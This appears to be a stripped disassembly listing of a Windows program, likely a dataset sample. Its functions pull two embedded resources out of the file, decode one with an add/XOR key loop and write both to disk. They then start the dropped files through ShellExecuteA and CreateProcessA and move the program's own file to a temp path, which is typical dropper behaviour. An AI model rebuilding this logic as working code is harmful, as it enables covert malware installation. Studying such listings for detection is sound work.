sub_401000
push esi
push rw-data
push 0x0
push 0x0
call [ CreateMutexA@IAT ]
mov esi eax
test esi esi
je r-xdata
push ebx
push edi
call sub_4010f0
mov ecx [ esp + 0x10 ]
push rw-data
push ecx
mov ecx eax
mov [ rw-data ] eax
call sub_4011f0
mov edi [ _beginthread@IAT ]
push 0x0
push 0x0
push sub_4010a0
call edi
push 0x0
push 0x0
push sub_4010d0
mov esi eax
call edi
mov ebx [ WaitForSingleObject@IAT ]
add esp 0x18
mov edi eax
push 0xffffffff
push esi
call ebx
push 0xffffffff
push edi
call ebx
mov ecx [ rw-data ]
call sub_401530
push esi
mov esi [ CloseHandle@IAT ]
call esi
push edi
call esi
pop edi
pop ebx
xor eax eax
pop esi
retn 0x10
call [ GetLastError@IAT ]
cmp eax 0xb7
jne r-xdata
push esi
call [ CloseHandle@IAT ]
or eax 0xffffffff
pop esi
retn 0x10
sub_4010f0
push 0xffffffff
push sub_40196b
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
push ecx
mov eax [ rw-data ]
test eax eax
jne r-xdata
mov ecx [ esp + 0x4 ]
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
push 0x620
call ??2@YAPAXI@Z
add esp 0x4
mov [ esp ] eax
test eax eax
mov [ esp + 0xc ] 0x0
je r-xdata
xor eax eax
mov [ rw-data ] eax
mov ecx eax
call sub_401160
mov [ rw-data ] eax
mov ecx [ esp + 0x4 ]
mov [ fs : 0x0 ] ecx
add esp 0x10
retn
sub_401160
mov edx ecx
push esi
push edi
mov ecx 0x41
lea esi [ edx + 0x8 ]
xor eax eax
mov edi esi
mov [ edx + 0x4 ] 0x0
[ edi ]
mov ecx 0x41
lea edi [ esi + 0x104 ]
[ edi ]
mov ecx 0x41
lea edi [ esi + 0x208 ]
[ edi ]
mov ecx 0x41
lea edi [ edx + 0x51c ]
mov [ edx ] r--data
[ edi ]
mov ecx 0x41
lea edi [ edx + 0x314 ]
[ edi ]
mov ecx 0x41
lea edi [ edx + 0x418 ]
[ edi ]
pop edi
mov eax edx
pop esi
retn
sub_4011f0
mov eax [ esp + 0x4 ]
mov edx [ esp + 0x8 ]
mov [ ecx + 0x4 ] eax
lea eax [ ecx + 0x314 ]
push esi
mov esi 0x104
sub edx eax
test esi esi
jne r-xdata
mov [ eax ] cl
inc eax
dec esi
jne r-xdata
mov [ eax ] 0x0
pop esi
retn 0x8
mov [ eax - 0x1 ] 0x0
pop esi
retn 0x8
mov cl [ edx + eax ]
test cl cl
je r-xdata
mov [ eax - 0x1 ] 0x0
pop esi
retn 0x8
sub_401270
push ecx
push ebx
push ebp
push esi
push edi
mov edi ecx
call sub_4015c0
mov ebx [ edi + 0x4 ]
push rw-data
push rw-data
push ebx
call [ FindResourceA@IAT ]
mov esi eax
test esi esi
je r-xdata
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
push esi
push ebx
call [ LoadResource@IAT ]
test eax eax
je r-xdata
push eax
call [ LockResource@IAT ]
mov ebp eax
test ebp ebp
je r-xdata
push esi
push 0x0
call [ SizeofResource@IAT ]
mov ebx eax
test ebx ebx
jle r-xdata
push 0x0
push 0x80
push 0x2
push 0x0
push 0x0
add edi 0x10c
push 0x40000000
push edi
call [ CreateFileA@IAT ]
mov esi eax
lea eax [ esp + 0x10 ]
push 0x0
push eax
push ebx
push ebp
push esi
call [ WriteFile@IAT ]
push esi
call [ CloseHandle@IAT ]
sub_401300
sub esp 0xc
push ebx
mov ebx [ CreateDirectoryA@IAT ]
push ebp
mov ebp [ GetLastError@IAT ]
push esi
push edi
mov [ esp + 0x10 ] rw-data
mov [ esp + 0x14 ] rw-data
mov [ esp + 0x18 ] rw-data
xor esi esi
lea edi [ esp + 0x10 ]
mov edx [ esp + esi * 4 + 0x10 ]
mov eax [ esp + 0x20 ]
mov esi 0x104
sub edx eax
call ebp
cmp eax 0xb7
je r-xdata
test esi esi
jne r-xdata
mov [ eax ] cl
inc eax
dec esi
jne r-xdata
inc esi
add edi 0x4
cmp esi 0x3
jb r-xdata
pop edi
pop esi
pop ebp
mov [ eax ] 0x0
pop ebx
add esp 0xc
retn 0x4
dec eax
mov cl [ edx + eax ]
test cl cl
je r-xdata
dec eax
pop edi
pop esi
pop ebp
mov [ eax ] 0x0
pop ebx
add esp 0xc
retn 0x4
mov eax [ edi ]
push 0x0
push eax
call ebx
cmp eax 0x1
je r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0xc
retn 0x4
sub_4013c0
sub esp 0x54
mov edx ecx
push edi
mov ecx 0x10
xor eax eax
lea edi [ esp + 0x18 ]
mov [ esp + 0x4 ] eax
[ edi ]
mov [ esp + 0x8 ] eax
lea ecx [ esp + 0x4 ]
mov [ esp + 0xc ] eax
push ecx
mov [ esp + 0x14 ] eax
lea eax [ esp + 0x18 ]
lea ecx [ edx + 0x418 ]
push eax
push ecx
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
add edx 0x51c
push 0x0
push edx
mov [ esp + 0x3c ] 0x44
call [ CreateProcessA@IAT ]
pop edi
add esp 0x54
retn
sub_401420
sub esp 0x20
mov ecx 0x7
xor eax eax
push ebp
push esi
push edi
mov esi rw-data
lea edi [ esp + 0xc ]
[ edi ] [ esi ]
movsw [ edi ] [ esi ]
movsb [ edi ] [ esi ]
lea edi [ esp + 0xc ]
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
xor esi esi
mov ebp ecx
mov ecx [ esp + 0x38 ]
xor edi edi
test ecx ecx
jbe r-xdata
mov eax [ esp + 0x34 ]
pop edi
pop esi
pop ebp
add esp 0x20
retn 0xc
push ebx
mov ebx [ esp + 0x38 ]
mov eax edi
xor edx edx
div ebp
mov al [ esp + edx + 0x10 ]
mov dl [ esi + ebx ]
add al dl
mov dl [ esp + 0x34 ]
xor al dl
mov [ esi + ebx ] al
inc esi
inc edi
cmp esi ecx
jb r-xdata
xor edi edi
test esi 0x3ff
jne r-xdata
mov eax ebx
pop ebx
pop edi
pop esi
pop ebp
add esp 0x20
retn 0xc
sub_4014a0
push ebx
push ebp
push esi
push edi
mov esi ecx
call sub_401700
mov edi [ esi + 0x4 ]
push rw-data
push rw-data
push edi
call [ FindResourceA@IAT ]
mov ebx eax
push ebx
push edi
call [ LoadResource@IAT ]
push eax
call [ LockResource@IAT ]
push ebx
push 0x0
mov ebp eax
call [ SizeofResource@IAT ]
mov edi eax
test edi edi
jle r-xdata
pop edi
pop esi
pop ebp
pop ebx
retn 0x4
mov eax [ esp + 0x14 ]
push edi
push ebp
push eax
mov ecx esi
call sub_401420
push 0x0
push 0x80
push 0x2
push 0x0
push 0x0
add esi 0x51c
push 0x40000000
push esi
mov ebx eax
call [ CreateFileA@IAT ]
lea ecx [ esp + 0x14 ]
push 0x0
push ecx
mov esi eax
push edi
push ebx
push esi
call [ WriteFile@IAT ]
push esi
call [ CloseHandle@IAT ]
sub_401530
sub esp 0x208
push esi
mov esi ecx
push edi
mov ecx 0x40
xor eax eax
lea edi [ esp + 0x9 ]
mov [ esp + 0x8 ] 0x0
mov [ esp + 0x10c ] 0x0
[ edi ]
stosw [ edi ]
stosb [ edi ]
mov ecx 0x40
xor eax eax
lea edi [ esp + 0x10d ]
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ esp + 0x10c ]
push eax
push 0x104
call [ GetTempPathA@IAT ]
lea ecx [ esp + 0x8 ]
lea edx [ esp + 0x10c ]
push ecx
push 0x0
push rw-data
push edx
call [ GetTempFileNameA@IAT ]
lea eax [ esp + 0x8 ]
push eax
call [ DeleteFileA@IAT ]
lea ecx [ esp + 0x8 ]
add esi 0x210
push ecx
push esi
call [ MoveFileA@IAT ]
pop edi
pop esi
add esp 0x208
retn
sub_4015c0
sub esp 0x208
push ebp
push esi
mov ebp ecx
push edi
mov ecx 0x40
xor eax eax
lea edi [ esp + 0xd ]
mov [ esp + 0xc ] 0x0
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ esp + 0xc ]
push 0x104
push eax
push 0x0
call [ GetModuleFileNameA@IAT ]
lea eax [ ebp + 0x8 ]
lea edx [ esp + 0xc ]
mov esi 0x104
sub edx eax
test esi esi
jne r-xdata
mov [ eax ] cl
inc eax
dec esi
jne r-xdata
mov [ eax ] 0x0
lea eax [ ebp + 0x210 ]
lea edx [ esp + 0xc ]
mov esi 0x104
sub edx eax
dec eax
mov cl [ edx + eax ]
test cl cl
je r-xdata
jmp r-xdata
test esi esi
jne r-xdata
mov [ eax ] cl
inc eax
dec esi
jne r-xdata
mov [ eax ] 0x0
lea edi [ esp + 0xc ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov al 0x5c
mov edx ecx
mov cl [ esp + edx + 0xa ]
sub edx 0x2
cmp cl al
je r-xdata
dec eax
mov cl [ edx + eax ]
test cl cl
je r-xdata
jmp r-xdata
mov ecx 0x40
xor eax eax
lea edi [ esp + 0x111 ]
mov [ esp + 0x110 ] 0x0
[ edi ]
stosw [ edi ]
lea esi [ esp + edx + 0xd ]
lea ecx [ esp + 0x110 ]
stosb [ edi ]
mov edx esi
mov edi 0x104
lea eax [ esp + 0x110 ]
sub edx ecx
mov cl [ esp + edx + 0xb ]
dec edx
cmp cl al
jne r-xdata
test edi edi
jne r-xdata
mov [ eax ] cl
inc eax
dec edi
jne r-xdata
lea edx [ esp + 0x110 ]
push rw-data
push edx
mov [ eax ] 0x0
call [ strstr@IAT ]
add esp 0x8
mov [ eax + 0x4 ] 0x0
lea eax [ esp + 0x110 ]
lea ecx [ esp + 0xc ]
push eax
push ecx
push rw-data
add ebp 0x10c
push 0x104
push ebp
mov [ esi ] 0x0
call sub_401740
add esp 0x14
pop edi
pop esi
pop ebp
add esp 0x208
retn
dec eax
mov cl [ edx + eax ]
test cl cl
je r-xdata
jmp r-xdata
sub_401700
push esi
mov esi ecx
push edi
lea edi [ esi + 0x418 ]
push edi
call sub_401300
lea eax [ esi + 0x314 ]
add esi 0x51c
push eax
push edi
push rw-data
push 0x104
push esi
call sub_401740
add esp 0x14
pop edi
pop esi
retn
sub_401740
mov eax [ esp + 0x8 ]
cmp eax 0x7fffffff
jbe r-xdata
push ebx
xor ebx ebx
push esi
push edi
test eax eax
jne r-xdata
mov eax 0x80070057
retn
mov ecx [ esp + 0x18 ]
mov edi [ esp + 0x10 ]
lea esi [ eax - 0x1 ]
lea eax [ esp + 0x1c ]
push eax
push ecx
push esi
push edi
call [ _vsnprintf@IAT ]
add esp 0x10
test eax eax
jl r-xdata
mov ebx 0x80070057
pop edi
mov eax ebx
pop esi
pop ebx
retn
mov [ esi + edi ] 0x0
mov ebx 0x8007007a
cmp eax esi
ja r-xdata
jne r-xdata
pop edi
mov eax ebx
pop esi
pop ebx
retn
mov [ esi + edi ] 0x0
pop edi
mov eax ebx
pop esi
pop ebx
retn
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_40194f
cmp [ rw-data ] ebx
jne r-xdata
call sub_40193a
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_40194c
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_401000
mov [ ebp - 0x68 ] eax
push eax
call [ exit@IAT ]
sub_4010a0
mov ecx [ rw-data ]
call sub_401270
mov ecx [ rw-data ]
call sub_4013a0
mov ecx [ rw-data ]
jmp sub_401530
sub_4010d0
mov ecx [ rw-data ]
push 0xc
call sub_4014a0
mov ecx [ rw-data ]
jmp sub_4013c0
sub_4011d0
push esi
mov esi ecx
call sub_401240
test [ esp + 0x8 ] 0x1
je r-xdata
mov eax esi
pop esi
retn 0x4
push esi
call ??3@YAXPAX@Z
add esp 0x4
sub_401240
mov [ ecx ] r--data
mov ecx [ rw-data ]
test ecx ecx
je r-xdata
mov [ rw-data ] 0x0
retn
mov eax [ ecx ]
push 0x1
call [ eax ]
sub_4013a0
push 0x5
push 0x0
add ecx 0x10c
push 0x0
push ecx
push rw-data
push 0x0
call [ ShellExecuteA@IAT ]
retn
??3@YAXPAX@Z
jmp [ operator delete@IAT ]
??2@YAPAXI@Z
jmp [ operator new@IAT ]
__CxxFrameHandler
jmp [ __CxxFrameHandler@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_40193a
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_40194c
xor eax eax
retn
sub_40194f
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
sub_401960
mov eax [ ebp - 0x10 ]
push eax
call ??3@YAXPAX@Z
pop ecx
retn
sub_40196b
mov eax r--data
jmp __CxxFrameHandler
